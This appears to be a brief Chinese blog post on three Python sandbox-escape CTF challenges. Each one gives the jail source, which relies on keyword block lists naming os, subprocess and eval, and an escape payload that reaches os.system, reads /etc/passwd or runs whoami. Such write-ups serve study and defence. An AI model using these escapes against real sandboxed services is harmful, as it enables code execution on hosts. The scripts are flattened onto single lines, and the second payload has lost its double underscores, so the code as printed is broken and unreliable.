python沙箱逃逸的幾道題
阿新 • • 發佈:2018-12-10
第一道
from __future__ import print_function print("Welcome to my Python sandbox! Enter commands below!") banned = [ "import", "exec", "eval", "pickle", "os", "subprocess", "kevin sucks", "input", "banned", "cry sum more", "sys" ] targets =__builtins__.__dict__.keys() targets.remove('raw_input') targets.remove('print') for x in targets: del __builtins__.__dict__[x] while 1: print(">>>", end=' ') data = raw_input() for no in banned: if no.lower() in data.lower(): print("Nobueno") break else: # this means nobreak exec data
payload: ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')
第二道
#!/usr/bin/env python from re import findall def make_secure(): UNSAFE = ['open', 'file', 'execfile', 'compile', 'reload', '__import__', 'eval', 'input'] for func in UNSAFE: del __builtins__.__dict__[func] # Remove dangerous builtins make_secure() print 'Go Ahead, Expoit me >;D' while True: try: print ">>>", # Read user input until the first whitespace character inp = findall('\S+', raw_input())[0] a = None # Set a to the result from executing the user input exec 'a=' + inp print 'Return Value:', a except Exception, e: print 'Exception:', e
payload:().class.bases[0].subclasses()[40]("/etc/passwd").read()
前兩道環境是py2,第三道是py3
第三道
# -*-coding:utf-8-*- #!/usr/bin/python3 import sys, cmd, os del __builtins__.__dict__['__import__'] del __builtins__.__dict__['eval'] intro = """ pwnhub cuit pwn everything Rules: -No import -No ... -No flag """ def execute(command): exec(command, globals()) class Jail(cmd.Cmd): prompt = '>>> ' filtered = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|') def do_EOF(self, line): sys.exit() def emptyline(self): return cmd.Cmd.emptyline(self) def default(self, line): sys.stdout.write('\x00') def postcmd(self, stop, line): if any(f in line for f in self.filtered): print("You are a big hacker !!!") print("Go away") else: try: execute(line) except NameError: print("NameError: name '%s' is not defined" % line) except Exception: print("Error: %s" % line) return cmd.Cmd.postcmd(self, stop, line) if __name__ == "__main__": try: Jail().cmdloop(intro) except KeyboardInterrupt: print("\rSee you next time !")
payload:print(getattr(os, "system")("whoami"))
等有空好好看看python面向物件的那一塊知識
參考連結:
http://www.php.cn/python-tutorials-356723.html
http://blog.51cto.com/13620939/2075204
https://xz.aliyun.com/t/52#toc-0
http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/
http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/